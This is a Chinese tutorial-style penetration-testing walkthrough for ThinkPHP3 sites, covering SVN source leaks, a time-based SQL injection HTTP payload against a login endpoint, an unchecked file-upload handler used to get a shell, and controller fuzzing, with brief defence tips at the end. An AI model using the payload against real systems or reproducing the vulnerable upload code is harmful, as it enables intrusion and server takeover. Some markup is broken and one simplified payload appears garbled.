ThinkPHP3框架渗透测试实战指南<\/h1>

1. ThinkPHP框架概述<\/h2>

ThinkPHP(TP)是一个开源免费的PHP开发框架，具有以下特点：<\/p>

快速、简单的面向对象轻量级框架<\/li>
遵循Apache2开源许可协议<\/li>

国内主流PHP框架之一，学习成本低<\/li> <\/ul>

1.1 主要版本及常见漏洞<\/h3>

TP6<\/strong>：常见任意文件操作漏洞<\/li> <\/ul>
2. 渗透测试前期准备<\/h2>
2.1 版本识别技巧<\/h3>
访问路径：xxx\/index.php\/index\/任意字符<\/code><\/p>
通常会返回无法找到控制器的报错信息<\/li> 报错页面会显示框架版本信息(除非自定义了错误页面)<\/li> <\/ul> 3. 实战案例1：SVN泄露→SQL注入→GetShell<\/h2> 3.1 SVN信息泄露利用<\/h3> 尝试访问.SVN<\/code>目录<\/li> 使用工具下载源码：svnExploit<\/a><\/li> <\/ol> 3.2 源码目录结构分析<\/h3> ├── Application # 应用目录(前后台) │ ├── Admin # 后台 │ │ ├── Action # 控制器(重要) │ ├── Home # 前台 │ │ ├── Action # 控制器(重要) ├── Public # 公开资源(js\/css\/images) ├── ThinkPHP # 框架核心文件 ├── Uploads # 上传文件目录 ├── index.php # 入口文件 <\/code><\/pre> 3.3 SQL注入漏洞挖掘<\/h3> 检查登录功能代码<\/li> 发现存在SQL注入的参数<\/li> 构造Payload：<\/li> <\/ol> POST<\/span> \/Home\/Login\/checkLogin.html HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 127.0.0.1<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>extension=xxx&x[0]=exp&x[1]==(select*from(select+sleep(5)union\/**\/select+1)a)&password=xxxx <\/span><\/span><\/code><\/pre> SQLMap使用技巧：<\/li> <\/ol> 需要对Payload进行简化处理：<\/li> <\/ul> extension=xxx&x[0]=exp&x[1]==(select from(*)a)&password=xxxx <\/span><\/span><\/span><\/code><\/pre>3.4 GetShell方法<\/h3> 全局搜索upload<\/code>关键字<\/li> 发现上传点代码：<\/li> <\/ol> public<\/span> function<\/span> uploadPic<\/span>() { <\/span><\/span> if<\/span> ($_FILES['pic'<\/span>]['error'<\/span>] !=<\/span> 4<\/span>) { <\/span><\/span> $image_name =<\/span> time<\/span>() .<\/span> rand<\/span>(1000<\/span>, 9999<\/span>) .<\/span> "."<\/span> .<\/span> end<\/span>(explode<\/span>("."<\/span>, $_FILES['pic'<\/span>]['name'<\/span>])); <\/span><\/span> move_uploaded_file<\/span>($_FILES['pic'<\/span>]['tmp_name'<\/span>], '.\/Uploads\/images\/login_pic\/'<\/span> .<\/span> $image_name); <\/span><\/span> $data['pic_path'<\/span>] =<\/span> "\/Uploads\/images\/login_pic\/"<\/span> .<\/span> $image_name; <\/span><\/span> $data['title'<\/span>] =<\/span> $_POST['title'<\/span>]; <\/span><\/span> $data['addtime'<\/span>] =<\/span> time<\/span>(); <\/span><\/span> M<\/span>("login_pic"<\/span>)-><\/span>add<\/span>($data); <\/span><\/span> $this-><\/span>success<\/span>("上传成功"<\/span>); <\/span><\/span> } else<\/span> { <\/span><\/span> $this-><\/span>error<\/span>("上传失败"<\/span>); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre> 上传路径构造：<\/li> <\/ol> 访问格式：xxx\/index.php\/应用名称\/控制器名\/方法名<\/code><\/li> 示例：xxx\/index.php\/Admin\/Manage\/loginPic<\/code><\/li> <\/ul> 上传后可通过数据库查询文件路径<\/li> <\/ol> 4. 实战案例2：控制器方法Fuzz<\/h2> 4.1 未授权访问漏洞挖掘<\/h3> 对控制器方法进行Fuzz测试<\/li> 常见路径格式：xxx\/index.php\/Admin\/Manage\/loginPic<\/code><\/li> 可能发现未做权限控制的上传控制器<\/li> <\/ol> 5. 渗透测试总结<\/h2> 信息收集<\/strong>：<\/p> 识别框架版本<\/li> 检查源码泄露(.SVN\/.git)<\/li> <\/ul> <\/li> 漏洞挖掘<\/strong>：<\/p> SQL注入：重点检查数据库操作点<\/li> 文件上传：全局搜索upload关键字<\/li> 未授权访问：Fuzz控制器和方法<\/li> <\/ul> <\/li> 权限提升<\/strong>：<\/p> 通过低权限账号利用上传漏洞<\/li> 利用数据库查询获取敏感信息<\/li> <\/ul> <\/li> TP3框架特点<\/strong>：<\/p> 常见于老旧系统<\/li> SQL注入漏洞较多<\/li> 权限控制不严格的情况常见<\/li> <\/ul> <\/li> <\/ol> 6. 防御建议<\/h2> 及时升级到最新版本<\/li> 严格过滤用户输入<\/li> 完善权限控制机制<\/li> 禁用或保护版本信息泄露<\/li> 定期进行安全审计<\/li> <\/ol> 通过以上方法，可以系统性地对ThinkPHP3框架应用进行渗透测试，发现并利用常见安全漏洞。<\/p>